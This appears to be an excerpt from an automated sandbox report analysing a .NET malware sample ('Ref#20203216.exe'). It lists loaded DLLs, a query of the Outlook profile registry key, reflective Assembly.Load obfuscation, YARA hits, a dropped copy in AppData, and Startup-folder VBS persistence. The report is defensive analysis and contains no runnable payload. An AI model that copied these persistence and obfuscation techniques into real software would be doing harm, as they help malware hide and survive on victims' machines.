                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: Ref#20203216.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Ref#20203216.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Ref#20203216.exe, 00000000.00000002.1782159785.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.0000000004101000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.00000000043B1000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000004.00000002.1948082008.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Ref#20203216.exe, 00000000.00000002.1782159785.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.0000000004101000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.00000000043B1000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000004.00000002.1948082008.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: Ref#20203216.exe, 00000000.00000002.1774875467.00000000042C7000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1781971825.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.00000000041FE000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: Ref#20203216.exe, 00000000.00000002.1774875467.00000000042C7000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1781971825.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.00000000041FE000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Source: Ref#20203216.exe, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                      Source: Ref#20203216.exe, Yelkge.cs.Net Code: Acyzeafq System.Reflection.Assembly.Load(byte[])
                      Source: iulue.exe.0.dr, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                      Source: iulue.exe.0.dr, Yelkge.cs.Net Code: Acyzeafq System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.Ref#20203216.exe.4322240.1.raw.unpack, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.Ref#20203216.exe.4322240.1.raw.unpack, Yelkge.cs.Net Code: Acyzeafq System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.Ref#20203216.exe.6e10000.10.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.Ref#20203216.exe.6e10000.10.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.Ref#20203216.exe.6e10000.10.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.Ref#20203216.exe.6e10000.10.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.Ref#20203216.exe.6e10000.10.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: 0.2.Ref#20203216.exe.42c74c0.3.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.Ref#20203216.exe.42c74c0.3.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.Ref#20203216.exe.42c74c0.3.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.Ref#20203216.exe.42c74c0.3.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.Ref#20203216.exe.42c74c0.3.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: Yara matchFile source: 0.2.Ref#20203216.exe.6da0000.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.1929062673.0000000002A89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1756518799.00000000031A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1781401675.0000000006DA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Ref#20203216.exe PID: 6776, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: iulue.exe PID: 3264, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\Ref#20203216.exeCode function: 1_2_012A0C55 push edi; retf 1_2_012A0C7A
                      Source: C:\Users\user\Desktop\Ref#20203216.exeCode function: 1_2_012AFF80 push es; ret 1_2_012AFF90
                      Source: C:\Users\user\AppData\Roaming\iulue.exeCode function: 4_2_0706075A push 00000029h; retf 4_2_0706075C
                      Source: C:\Users\user\AppData\Roaming\iulue.exeCode function: 4_2_070625DF push cs; retf 4_2_070625E0
                      Source: C:\Users\user\AppData\Roaming\iulue.exeCode function: 4_2_070622B4 push cs; retf 4_2_070622B5
                      Source: C:\Users\user\Desktop\Ref#20203216.exeFile created: C:\Users\user\AppData\Roaming\iulue.exeJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Users\user\Desktop\Ref#20203216.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iulue.vbsJump to dropped file
                      Source: C:\Users\user\Desktop\Ref#20203216.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iulue.vbsJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iulue.vbsJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
